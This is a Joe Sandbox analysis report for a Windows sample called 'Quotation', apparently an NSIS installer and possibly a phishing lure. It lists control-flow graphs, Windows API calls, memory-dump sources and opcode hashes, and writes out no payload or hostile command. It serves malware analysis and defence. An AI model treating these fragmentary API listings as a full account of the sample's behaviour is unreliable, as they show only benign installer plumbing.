                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                                                                              • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                              • API String ID: 4187626192-3890947278
                                                                                              • Opcode ID: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                              • Instruction ID: e5fb9ae88836c379eadb94168964a2c41ebb3bf79b6cd8bfde1838e31315b013
                                                                                              • Opcode Fuzzy Hash: 90908ed2b1fff3d7c45b9d6734c0443e5caff99512698a5aebad6b02f2870112
                                                                                              • Instruction Fuzzy Hash: 0E6115716442159BDB24AB288C40A3B76A4EF99350F11853FF982F72D1EB3CC9258B5E

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 930 405d18-405d24 931 405df5-405df9 930->931 932 405d2a-405d3d 930->932 933 405d49-405d59 lstrlenW 932->933 934 405d3f-405d44 call 405e98 932->934 936 405d5b-405d6a lstrlenW 933->936 937 405d7e 933->937 934->933 938 405d70-405d7c lstrcatW 936->938 939 405df2-405df4 936->939 940 405d83-405d86 937->940 938->940 939->931 941 405d95-405d98 940->941 942 405d88-405d8f SetWindowTextW 940->942 943 405de0-405de2 941->943 944 405d9a-405dde SendMessageW * 3 941->944 942->941 943->939 945 405de4-405dea 943->945 944->943 945->939
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,00000000,?,?), ref: 00405D4A
                                                                                              • lstrlenW.KERNEL32(?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,00000000,?,?), ref: 00405D5C
                                                                                              • lstrcatW.KERNEL32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,00000000,?,?), ref: 00405D77
                                                                                              • SetWindowTextW.USER32(Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll), ref: 00405D8F
                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405DB6
                                                                                              • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DD1
                                                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405DDE
                                                                                                • Part of subcall function 00405E98: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch,?,?,Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll,?,?,?), ref: 0040604E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                                                                              • String ID: Skipped: C:\Users\user~1\AppData\Local\Temp\nsbDE39.tmp\System.dll
                                                                                              • API String ID: 1759915248-4216733504
                                                                                              • Opcode ID: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                              • Instruction ID: eb00d4876afd5f62942919e2a46038e7a2417e41af97232aca8a81e0ace8ac77
                                                                                              • Opcode Fuzzy Hash: b3a3bffc108da763a0d5830401e4444f920c759f89e848b3eba3191ccd966a9d
                                                                                              • Instruction Fuzzy Hash: C7212672A056206BC310AF598D44E5BBBDCFF95310F04443FF988B3291C7B89D018BAA

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 997 40617c-40619c GetSystemDirectoryW 998 4061b6 997->998 999 40619e-4061a0 997->999 1001 4061b8 998->1001 999->998 1000 4061a2-4061ad 999->1000 1000->1001 1003 4061af-4061b4 1000->1003 1002 4061bd-4061ea wsprintfW LoadLibraryExW 1001->1002 1003->1002
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                              • wsprintfW.USER32 ref: 004061CF
                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                                              • API String ID: 2200240437-1946221925
                                                                                              • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                              • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                              • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                              • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1004 406a34-406a40 1005 406a41-406a73 GetTickCount GetTempFileNameW 1004->1005 1006 406a75-406a77 1005->1006 1007 406a7e 1005->1007 1006->1005 1008 406a79-406a7c 1006->1008 1009 406a80-406a83 1007->1009 1008->1009
                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00406A50
                                                                                              • GetTempFileNameW.KERNELBASE(?,0073006E,00000000,?,?,?,00000000,00403CB2,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00406A6B
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00406A39
                                                                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406A3D
                                                                                              • a, xrefs: 00406A49
                                                                                              • n, xrefs: 00406A42
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountFileNameTempTick
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$a$n
                                                                                              • API String ID: 1716503409-3496289110
                                                                                              • Opcode ID: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                              • Instruction ID: 42be8ac81fa96e2418e52fe12c64c606f0e7da939330081f96b146de974569e0
                                                                                              • Opcode Fuzzy Hash: 42452896a03faa5c12687f234f03a62933820c93469ae2d29fedaba6baed2be8
                                                                                              • Instruction Fuzzy Hash: EDF05E72700208BBEB149F85DD09BEF7769EF91B10F15807BE945BA180E6B05E9487A4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1010 4068c4-4068da GetModuleHandleA 1011 4068e6-4068ee GetProcAddress 1010->1011 1012 4068dc-4068dd call 40617c 1010->1012 1014 4068f4-4068f6 1011->1014 1015 4068e2-4068e4 1012->1015 1015->1011 1015->1014
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                                • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                                • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                                • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004061E3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                              • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                              • API String ID: 2547128583-890815371
                                                                                              • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                              • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                              • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                              • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1016 405e1c-405e65 CreateDirectoryW 1017 405e67-405e72 GetLastError 1016->1017 1018 405e8a-405e8c 1016->1018 1019 405e94-405e95 1017->1019 1020 405e74-405e88 SetFileSecurityW 1017->1020 1018->1019 1020->1018 1021 405e8e GetLastError 1020->1021 1021->1019
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,?), ref: 00405E5D
                                                                                              • GetLastError.KERNEL32 ref: 00405E67
                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,?), ref: 00405E80
                                                                                              • GetLastError.KERNEL32 ref: 00405E8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                              • String ID:
                                                                                              • API String ID: 3449924974-0
                                                                                              • Opcode ID: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                              • Instruction ID: c5276d81fc3706eb17032c67a8bd40c2bbffd7631990a047acf891ba11bc5777
                                                                                              • Opcode Fuzzy Hash: c4ec091984c90c0ed15a9be6932df6b8cec91024cb801c9daff41168a069ff59
                                                                                              • Instruction Fuzzy Hash: 39011A74D00609DFDB109FA0DA44BAE7BB4EB04315F10443AD949F6190D77886488F99

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1022 406955-406988 call 4062b6 1025 4069c7-4069c9 1022->1025 1026 40698a-4069b9 RegQueryValueExW RegCloseKey 1022->1026 1027 4069cc-4069ce 1025->1027 1026->1025 1028 4069bb-4069bf 1026->1028 1028->1027 1029 4069c1-4069c5 1028->1029 1029->1025 1029->1027
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,?,?,Call,00000000,00000000,00000002,00405F9C), ref: 0040699C
                                                                                              • RegCloseKey.KERNELBASE(?), ref: 004069A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue
                                                                                              • String ID: Call
                                                                                              • API String ID: 3356406503-1824292864
                                                                                              • Opcode ID: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                              • Instruction ID: 1ae9e56a03760404e91669882a34a602e62d6bc2f034f3a498143100352ea1f7
                                                                                              • Opcode Fuzzy Hash: 76b6ba2905dba72e0879de14cdf3f2fb9278ac09f103d2f047db2673b29e615b
                                                                                              • Instruction Fuzzy Hash: F6015EB652010AABDF218FA4DD06EEF7BA8EF44354F110136F905E2260E334DA64DB94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1030 405dfc-405e0c CreateDirectoryW 1031 405e16-405e19 1030->1031 1032 405e0e-405e14 GetLastError 1030->1032 1032->1031
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,C:\Users\user~1\AppData\Local\Temp\,00403CA7,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004039A0), ref: 00405E04
                                                                                              • GetLastError.KERNEL32 ref: 00405E0E
                                                                                              Strings
                                                                                              • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DFC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1664040990.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                              • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                                                              • API String ID: 1375471231-2382934351
                                                                                              • Opcode ID: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                              • Instruction ID: 1d45a01f7acee8fa23fe776dff3dd1d011af88d7d8ca29917c3c3e776444c4f1
                                                                                              • Opcode Fuzzy Hash: 0648b17569fc2713f910b90d2ba9bcc6c5026819f2e8f4ff2f6a8f9bab12dfc5
                                                                                              • Instruction Fuzzy Hash: 74C012326000309BC7602B65AE08A87BE94EB506A13068239B988E2220DA308C54CAE8
                                                                                              APIs
                                                                                                • Part of subcall function 73C62351: GlobalFree.KERNEL32(?), ref: 73C62A44
                                                                                                • Part of subcall function 73C62351: GlobalFree.KERNEL32(?), ref: 73C62A4A
                                                                                                • Part of subcall function 73C62351: GlobalFree.KERNEL32(?), ref: 73C62A50
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C61738
                                                                                              • FreeLibrary.KERNEL32(?), ref: 73C617C3
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 73C617E9
                                                                                                • Part of subcall function 73C61FCB: GlobalAlloc.KERNEL32(?,?), ref: 73C61FFA
                                                                                                • Part of subcall function 73C617F7: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,73C61708,00000000), ref: 73C6189A
                                                                                                • Part of subcall function 73C61F1E: wsprintfW.USER32 ref: 73C61F51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1700170196.0000000073C61000.00000020.00000001.01000000.00000006.sdmp, Offset: 73C60000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1700136745.0000000073C60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700188621.0000000073C64000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1700247569.0000000073C66000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_73c60000_Quotation.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3962662361-0
                                                                                              • Opcode ID: e699255d55c616ad2c8d2a79a15f05e654f8aa815d70d1d55e731c19fb9235a0
                                                                                              • Instruction ID: 82c30a85497b223b3497ef2cf97e4d6588e352a79bb13e8ce9f2a4aded7dfa3b
                                                                                              • Opcode Fuzzy Hash: e699255d55c616ad2c8d2a79a15f05e654f8aa815d70d1d55e731c19fb9235a0
                                                                                              • Instruction Fuzzy Hash: EF41AD7640438DEFEB61EE25D8C4B9A37FDBB00322F158019F94EDE181DB74A984CA51
                                                                                              APIs
                                                                                              • MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662370850.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662321780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662458945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662590606.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
